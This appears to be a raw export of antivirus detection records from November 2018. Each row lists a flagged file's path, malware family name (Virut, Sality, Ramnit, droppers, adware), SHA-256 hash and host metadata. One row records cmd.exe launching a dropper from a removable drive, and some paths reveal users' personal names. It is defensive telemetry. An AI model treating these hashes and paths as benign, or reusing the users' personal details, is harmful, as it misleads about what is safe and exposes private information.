  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7d3b3b7dd8a1433488fe97914613de0b3f0141c1c9d716c7c0f3b6ddcba70f01', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=192000, timestamp='2018-11-01T10:09:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114341-565dfd87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cc180c4\\AVSCAN-20181101-114327-53C65CA8\\AVSCAN-20181101-114341-565DFD87', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230313-a558150d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c09a7113\\AVSCAN-20181101-230247-A16E7500\\AVSCAN-20181101-230313-A558150D', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:03:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='5d85f2d24dda09e6ec547d4e6a2f0a650896890eb63854c22dfdec84c5461384', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dutch.scr', filepath='F:\\New folder\\Corel Draw 12\\Dutch\\Dutch.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_15_7_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_15_7_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='34a7c7bb6a35762dbe9afceadf0c6df8c4891d01d67899f0ed21dccfee13519a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:05:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003401-8371dde1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003401-8371DDE1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='82e382168fd20de76f7dbc8752feeed2ca7a2b74dd63fec735bedf290f97f49e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172406-c3b519f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ea6e91c\\AVSCAN-20181101-172124-AAEC8651\\AVSCAN-20181101-172406-C3B519F3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:24:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220433-57f8859d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c9b8cea\\AVSCAN-20181101-211938-33E69CE4\\AVSCAN-20181101-220433-57F8859D', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:04:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='\\\\psf\\Home\\Downloads\\Setup-2 2\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='\\Device\\Mup\\psf\\Home\\Downloads\\Setup-2 2\\Setup.exe', parentsize=None, timestamp='2018-11-01T18:54:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pminst.exe', filepath='C:\\Program Files (x86)\\MELSOFT\\PMCNF\\PMInst.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='f1406e995110037ca738e7cee9a82944e1fc934fa3521a29ab4fe4f0b2172c99', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bworamm2EEOVuB+M.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T18:25:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='volantini.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\VOLANTINI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145858-809a5a60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145858-809A5A60', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162848-86b29ab6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-162848-86B29AB6', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152451-aa31d050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152451-AA31D050', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074454-628674a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074454-628674A5', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194530-41b2574e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194530-41B2574E', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lnefmfmg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\lnEFMFmg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a9f62a82f6d50f83cc3176b8ea42bf6dc8a4b79625b50e2ae8b66709fdfcf111', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:31:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095138-5141e97a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095138-5141E97A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T04:23:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095542-801b3c95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095542-801B3C95', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deletedoctor.exe', filepath='K:\\HBCD\\Programs\\DELETEDOCTOR.EXE', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3exbbzj1jys\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0113123.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113123.EXE', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:32:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095311-6319fc1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095311-6319FC1C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ikvbaksl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\ikVbakSL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='caloiero giuseppina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\CALOIERO GIUSEPPINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpusbfw.exe', filepath='\\\\?\\J:\\لتنزيل الويندوز على فلاشة\\ASD.Win.Setup.1.0.Beta.7.AhMeD00FaWzY\\ASD.Win.Setup.1.0.Beta.7.AhMeD00FaWzY\\files\\tools\\HPUSBFW.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='dde4b9ce77a487fbc4265bdb537c63c6634d686c96695dfd20856451d04babd4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152357-4c3d0b94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152357-4C3D0B94', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gc.exe', filepath='GC.exe', filesize=128000, name='APPL/ChromePassV.1.#M0.#R0'), hash='dbfa10a7deeb6d1ac8fd95ffeb23b87adc58e6388e522812fabe7f710e3cdd89', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:22:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094603-10fcbb83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094603-10FCBB83', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='34835e4d-547e-1735-adc9-16a3df9122f1.exe', filepath='H:\\{b1fba84f-834a-faa0-7a17-0065e1e21247}\\34835e4d-547e-1735-adc9-16a3df9122f1.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='17bcdcfb4288765797884a83bab607e7e9e9e73758e26108304b61b044653152', metadata=Row(cmdline='\\\\\\/c \\\\\\"{b1fba84f-834a-faa0-7a17-0065e1e21247}\\\\\\\\34835e4d-547e-1735-adc9-16a3df9122f1.exe \'Family day taska 2018\\\\\\\\\'\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T13:09:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:47:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075037-3433e660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63e0ab73\\AVSCAN-20181104-074040-F38039E3\\AVSCAN-20181104-075037-3433E660', filesize=980000, name='PUA/InstallCore.KV.#M1.#R1'), hash='5b1e7e2a20c21b19c4a902791537ad7b82c85529dc4a540408209e7cb452fd7f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:50:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsd1B8A.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T12:48:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-04T04:37:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='الجواهر.exe', filepath='\\?\\J:\\الجواهر\\الجواهر.exe', filesize=768000, name='W32/Virut.Gen.#M1.#R1'), hash='08f30370b82a4cdd9534a8b45dd501a8ea555cc59769c609f8ed135dfcde750d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:33:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221838-e28c7a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c952ea04\\AVSCAN-20181104-221818-DF68D63E\\AVSCAN-20181104-221838-E28C7A2A', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:18:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151239-6e4419f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151157-699E1055\\AVSCAN-20181104-151239-6E4419F0', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:12:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225838-27108395', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202113-A73A1DA0\\AVSCAN-20181104-225838-27108395', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131617-2e13c029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131617-2E13C029', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024350', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024350', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install_avast.exe', filepath='C:\\Users\\X\\Downloads\\install_avast.exe', filesize=772000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='a4a17ecc40c0fa3958714ff2b9ffef9b1543a19d8fc9d67bb3e84529a363713f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T15:26:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b30fc1da44f97eef2d06c983b312bb6d308fe531', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b30fc1da44f97eef2d06c983b312bb6d308fe531', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='8cc70b959feaba7fd476ea357e2da573e4e43c6eca7e5712210717e30d742ccf', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230418-36149bed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230418-36149BED', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:18Z'), dt=datetime.date(2018, 11, 4)),
